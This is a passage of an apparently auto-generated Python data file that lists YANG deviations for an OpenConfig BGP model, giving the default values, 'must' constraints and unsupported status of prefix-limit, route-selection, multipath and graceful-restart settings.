('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.UseMultiplePaths.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp.Config.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp.State.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.Confederation.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.GracefulRestart.Config.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.GracefulRestart.State.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.Config.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.Config.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.RouteSelectionOptions.Config.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.RouteSelectionOptions.Config.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.State.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.State.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.RouteSelectionOptions.State.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.RouteSelectionOptions.State.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.UseMultiplePaths.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.UseMultiplePaths.Ebgp.Config.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.UseMultiplePaths.Ebgp.State.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.Config.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.Config.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.State.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.State.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.State.advertised' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.State.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.State.received' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.State.Prefixes.installed' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.Config.allow_own_as' : {
